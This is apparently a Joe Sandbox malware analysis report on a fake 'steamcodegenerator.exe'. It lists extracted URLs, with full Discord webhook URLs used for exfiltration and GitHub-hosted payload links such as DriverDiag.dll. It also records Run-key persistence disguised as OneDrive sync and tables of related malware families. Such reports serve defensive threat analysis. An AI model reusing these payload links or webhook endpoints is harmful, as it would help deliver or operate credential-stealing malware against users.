https://objects.githubusercontent.com/2 | steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000003.2201099145.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_ | powershell.exe, 00000011.00000002.2874987774.000001D184C70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C6C000.00000004.00000800.00020000.00000000.sdmp | true | - | unknown
https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kN | powershell.exe, 00000006.00000002.2593081552.000001FB81649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB81E52000.00000004.00000800.00020000.00000000.sdmp | true | - | unknown
https://contoso.com/License | powershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discord.com/ | powershell.exe, 00000006.00000002.2593081552.000001FB81F9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39D2B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185681000.00000004.00000800.00020000.00000000.sdmp | true | - | unknown
http://discord.com | powershell.exe, 00000006.00000002.2593081552.000001FB81E52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39D17E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185636000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://github.com/user-attachments/files/17267811/stm.txtiR | steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://raw.githubusercontent.comp | powershell.exe, 00000006.00000002.2593081552.000001FB80391000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://discord.com/api/webhooks/128545359042878 | powershell.exe, 0000000D.00000002.2798056511.000002B39D17E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185636000.00000004.00000800.00020000.00000000.sdmp | true | - | unknown
https://github.com/ | steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.2392788423.000001663B9CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2392788423.000001663BB02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2376546046.000001662D22A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2657006446.000001FB901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/user-attachments/files/17267811/stm.txtll | steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729DC000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://oneget.orgX | powershell.exe, 00000004.00000002.2376546046.000001662CDB6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://raw.githubuserconte | powershell.exe, 00000006.00000002.2593081552.000001FB80FE5000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.2376546046.000001662B951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39BCED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184123000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://0.discord.com/ | powershell.exe, 00000006.00000002.2593081552.000001FB81F9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39D2B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185681000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.2392788423.000001663B9CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2392788423.000001663BB02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2376546046.000001662D22A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2657006446.000001FB901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000004.00000002.2376546046.000001662CDB6000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://discord.com | powershell.exe, 0000000D.00000002.2798056511.000002B39D17E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185636000.00000004.00000800.00020000.00000000.sdmp | true | - | unknown
https://objects.githubusercontent.com/t | steamcodegenerator.exe, 00000000.00000003.2187911601.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.2593081552.000001FB80224000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ | powershell.exe, 0000000D.00000002.2798056511.000002B39C85F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C70000.00000004.00000800.00020000.00000000.sdmp | true | - | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.2593081552.000001FB80224000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://github.com/user-attachments/files/17267811/stm.txtF | steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729DC000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://go.micro | powershell.exe, 00000006.00000002.2593081552.000001FB80FE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D18470A000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
https://github.com/user-attachments/files/17267811/stm.txtE | steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729CC000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercont | powershell.exe, 00000006.00000002.2593081552.000001FB815FD000.00000004.00000800.00020000.00000000.sdmp | true | - | unknown
https://discord.p | powershell.exe, 00000006.00000002.2593081552.000001FB81F9A000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.2593081552.000001FB80224000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://objects.githubusercontent.com/github-production-repository-file-5c1aeb/867932512/17267811?X- | steamcodegenerator.exe, 00000000.00000003.2201099145.0000020C72A62000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000003.2187911601.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398727720.0000020C74620000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://objects.githubusercontent.com/GP | steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://0.discor | powershell.exe, 00000006.00000002.2593081552.000001FB81F9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39D2B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185681000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://raw.githubusercontent.com | powershell.exe, 00000006.00000002.2593081552.000001FB815FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C7F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184BC4000.00000004.00000800.00020000.00000000.sdmp | true | - | unknown
https://github.com/user-attachments/files/17267811/stm.txt%pinvalid | steamcodegenerator.exe | false | - | unknown
https://objects.githubusercontent.com/ | steamcodegenerator.exe, 00000000.00000003.2187911601.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000003.2201099145.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://raw.githubusercontent.com | powershell.exe, 00000006.00000002.2593081552.000001FB815FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB80224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB8161B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB80FE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C7C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C7F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B95000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://github.com/user-attachments/files/17267811/stm.txtl | steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729DC000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.2376546046.000001662B951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39BD2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39BD17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D1840FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D1840E9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/user-attachments/files/17267811/stm.txtk | steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll | powershell.exe, 00000006.00000002.2593081552.000001FB81642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB803C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB81649000.00000004.00000800.00020000.00000000.sdmp | true | - | unknown
http://pastebin.com | powershell.exe, 0000000D.00000002.2798056511.000002B39C74A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C72E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D18470A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184AFA000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://pastebin.com | powershell.exe, 0000000D.00000002.2798056511.000002B39C738000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B06000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://oneget.org | powershell.exe, 00000004.00000002.2376546046.000001662CDB6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/B: | steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.19.24 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
162.159.138.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | true
185.199.109.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | true
140.82.121.3 | github.com | United States | 36459 | GITHUBUS | false
185.199.111.133 | objects.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1534102
                                                                                                    Start date and time:2024-10-15 15:51:13 +02:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 6m 25s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:18
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:steamcodegenerator.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal96.troj.evad.winEXE@21/17@5/5
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 50%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 85%
                                                                                                    • Number of executed functions: 29
                                                                                                    • Number of non-executed functions: 74
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 4372 because it is empty
                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 5144 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • VT rate limit hit for: steamcodegenerator.exe
Time | Type | Description
09:52:30 | API Interceptor | 427x Sleep call for process: powershell.exe modified
15:52:43 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
15:52:51 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.19.24 | cr_asm.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | envifa.vbs | malicious | Unknown | pastebin.com/raw/V9y5Q5vv
172.67.19.24 | sostener.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
172.67.19.24 | Invoice Payment N8977823.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
172.67.19.24 | Pending_Invoice_Bank_Details_XLSX.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
172.67.19.24 | Dadebehring PendingInvoiceBankDetails.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
172.67.19.24 | PendingInvoiceBankDetails.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
162.159.138.232 | cr_asm.ps1 | malicious | Unknown |
162.159.138.232 | SecuriteInfo.com.Win64.MalwareX-gen.20317.810.exe | malicious | Unknown |
162.159.138.232 | SecuriteInfo.com.Python.Muldrop.18.50.31694.exe | malicious | Blank Grabber |
162.159.138.232 | Exela(1).exe | malicious | Exela Stealer, Python Stealer |
162.159.138.232 | SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll | malicious | AsyncRAT, XWorm |
162.159.138.232 | http://relay.csgoze520.com/ | malicious | Unknown |
162.159.138.232 | https://hkdiscord.antsoon.com/ | malicious | Unknown |
162.159.138.232 | RebelCracked.exe | malicious | Exela Stealer, Python Stealer |
162.159.138.232 | lol.exe | malicious | Blank Grabber, Umbral Stealer |
162.159.138.232 | ExtremeInjectorV3.exe | malicious | Blank Grabber, Umbral Stealer |
185.199.109.133 | SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll | malicious | Metasploit | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
185.199.109.133 | SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll | malicious | AsyncRAT, XWorm | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
Match | Associated Sample Name / URL | Detection | Threat Name | Context
discord.com | cr_asm.ps1 | malicious | Unknown | 162.159.138.232
discord.com | Q1KaSJ8Fom.exe | malicious | Unknown | 162.159.135.232
discord.com | Q1KaSJ8Fom.exe | malicious | Unknown | 162.159.136.232
discord.com | 0CX5vBE7nr.exe | malicious | Babadeda, KDOT TOKEN GRABBER | 162.159.137.232
discord.com | 0CX5vBE7nr.exe | malicious | Babadeda, KDOT TOKEN GRABBER | 162.159.136.232
discord.com | cPl7CoJTBx.exe | malicious | Luna Grabber, Luna Logger | 162.159.128.233
discord.com | SecuriteInfo.com.Win64.MalwareX-gen.20317.810.exe | malicious | Unknown | 162.159.138.232
discord.com | SecuriteInfo.com.Python.Muldrop.18.50.31694.exe | malicious | Blank Grabber | 162.159.138.232
discord.com | SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exe | malicious | Unknown | 162.159.136.232
discord.com | SecuriteInfo.com.Win64.Evo-gen.30154.6249.exe | malicious | Unknown | 162.159.135.232
raw.githubusercontent.com | cr_asm.ps1 | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | na.hta | malicious | Cobalt Strike, Remcos | 185.199.109.133
raw.githubusercontent.com | na.hta | malicious | Cobalt Strike, FormBook | 185.199.108.133
raw.githubusercontent.com | oWARzPF1Ms.exe | malicious | PureLog Stealer | 185.199.108.133
raw.githubusercontent.com | oWARzPF1Ms.exe | malicious | PureCrypter, PureLog Stealer | 185.199.108.133
raw.githubusercontent.com | New PO-RFQ13101.xla.xlsx | malicious | FormBook | 185.199.110.133
raw.githubusercontent.com | Upit 220062.xls | malicious | Remcos | 185.199.108.133
raw.githubusercontent.com | Swift Payment 20241014839374.vbs | malicious | Remcos | 185.199.111.133
raw.githubusercontent.com | Image_Attachments.xls | malicious | Remcos | 185.199.111.133
raw.githubusercontent.com | Purchase Order.js | malicious | AgentTesla | 185.199.109.133
github.com | 0CX5vBE7nr.exe | malicious | Babadeda, KDOT TOKEN GRABBER | 140.82.112.4
github.com | 0CX5vBE7nr.exe | malicious | Babadeda, KDOT TOKEN GRABBER | 140.82.121.3
github.com | Telex-copy-pdf.jar | malicious | Branchlock Obfuscator, STRRAT | 140.82.121.4
github.com | https://www.mycimalive.com/ | malicious | Unknown | 140.82.121.4
github.com | Payment.Telex-pdf (2).jar | malicious | Branchlock Obfuscator, STRRAT | 140.82.121.3
github.com | Payment.Telex-pdf.jar | malicious | Branchlock Obfuscator, STRRAT | 140.82.121.4
github.com | srSirV44HB.jar | malicious | Branchlock Obfuscator, STRRAT | 140.82.121.3
github.com | Request For Quotation.js | malicious | STRRAT | 140.82.121.3
github.com | launcher.exe | malicious | Unknown | 140.82.121.4
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | cr_asm.ps1 | malicious | Unknown | 162.159.138.232
CLOUDFLARENETUS | HqvlYZC7Gf.exe | malicious | Unknown | 104.27.206.92
CLOUDFLARENETUS | https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m- | malicious | Unknown | 162.159.134.42
CLOUDFLARENETUS | https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.html | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | ordine.pdf | malicious | Unknown | 104.21.90.114
CLOUDFLARENETUS | ordine.pdf | malicious | HtmlDropper | 188.114.96.3
CLOUDFLARENETUS | order.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.97.3
CLOUDFLARENETUS | https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20= | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | Factura.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3
CLOUDFLARENETUS | ordine.pdf | malicious | Unknown | 188.114.96.3
FASTLYUS | cr_asm.ps1 | malicious | Unknown | 185.199.108.133
FASTLYUS | https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20= | malicious | HTMLPhisher | 151.101.1.229
FASTLYUS | na.hta | malicious | Cobalt Strike, Remcos | 185.199.109.133
FASTLYUS | na.hta | malicious | Cobalt Strike, FormBook | 185.199.108.133
FASTLYUS | ordine.pdf | malicious | Unknown | 199.232.210.172
FASTLYUS | Payment(Ssalazar)CQDM.html | malicious | Unknown | 151.101.65.229
FASTLYUS | RicevutaPagamento_115538206.dat | malicious | Unknown | 151.101.2.132
FASTLYUS | V6QED2Q1WBYVOPE | malicious | Unknown | 151.101.67.6
FASTLYUS | https://www.brstejtv.com/wsx | malicious | Unknown | 151.101.193.229
FASTLYUS | https://landing-cs.mailcomms.io/73C4D162CAD9C4016A99EC5AF537DA57B4F5451828F0865A7DC8EA34ED2492F0 | malicious | Unknown | 151.101.65.229
GITHUBUS | 0CX5vBE7nr.exe | malicious | Babadeda, KDOT TOKEN GRABBER | 140.82.112.4
GITHUBUS | 0CX5vBE7nr.exe | malicious | Babadeda, KDOT TOKEN GRABBER | 140.82.121.3
GITHUBUS | Telex-copy-pdf.jar | malicious | Branchlock Obfuscator, STRRAT | 140.82.121.4
GITHUBUS | Payment.Telex-pdf (2).jar | malicious | Branchlock Obfuscator, STRRAT | 140.82.121.4
GITHUBUS | Payment.Telex-pdf.jar | malicious | Branchlock Obfuscator, STRRAT | 140.82.121.4
GITHUBUS | srSirV44HB.jar | malicious | Branchlock Obfuscator, STRRAT | 140.82.121.4
GITHUBUS | Request For Quotation.js | malicious | STRRAT | 140.82.121.4
GITHUBUS | launcher.exe | malicious | Unknown | 140.82.112.4
GITHUBUS | launcher.exe | malicious | Unknown | 140.82.121.4
GITHUBUS | SecuriteInfo.com.FileRepMalware.7131.28226.exe | malicious | Unknown | 140.82.121.5
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | cr_asm.ps1 | malicious | Unknown | 162.159.138.232, 172.67.19.24, 185.199.109.133
3b5074b1b5d032e5620f69f9f700ff0e | https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20= | malicious | HTMLPhisher | 162.159.138.232, 172.67.19.24, 185.199.109.133
3b5074b1b5d032e5620f69f9f700ff0e | na.hta | malicious | Cobalt Strike, Remcos | 162.159.138.232, 172.67.19.24, 185.199.109.133
3b5074b1b5d032e5620f69f9f700ff0e | na.hta | malicious | Cobalt Strike, FormBook |
                                                                                                                        • 162.159.138.232
                                                                                                                        • 172.67.19.24
                                                                                                                        • 185.199.109.133
                                                                                                                        LISTA DE COTIZACIONES.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        • 172.67.19.24
                                                                                                                        • 185.199.109.133
                                                                                                                        https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=janice.atkins@faa.govGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        • 172.67.19.24
                                                                                                                        • 185.199.109.133
                                                                                                                        PO-10-15-2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        • 172.67.19.24
                                                                                                                        • 185.199.109.133
                                                                                                                        https://landing-cs.mailcomms.io/73C4D162CAD9C4016A99EC5AF537DA57B4F5451828F0865A7DC8EA34ED2492F0Get hashmaliciousUnknownBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        • 172.67.19.24
                                                                                                                        • 185.199.109.133
                                                                                                                        https://www.filmize.art/azacGet hashmaliciousUnknownBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        • 172.67.19.24
                                                                                                                        • 185.199.109.133
                                                                                                                        r8k29DBraE.exeGet hashmaliciousXWormBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        • 172.67.19.24
                                                                                                                        • 185.199.109.133
                                                                                                                        37f463bf4616ecd445d4a1937da06e19Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        Prximos VencimientosPDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        dg_official01.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        doc-Impostos.cmdGet hashmaliciousUnknownBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        9evHLnwull.exeGet hashmaliciousVidarBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        Proforma_InvoicePDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        CHHE6LLjWx.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        Request for Quotation MK FMHS.RFQ.10.24.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        Request for Quotation MK FMHS.RFQ.10.24.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        Request for Quotation MK FMHS.RFQ.10.24_PDF.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        No context
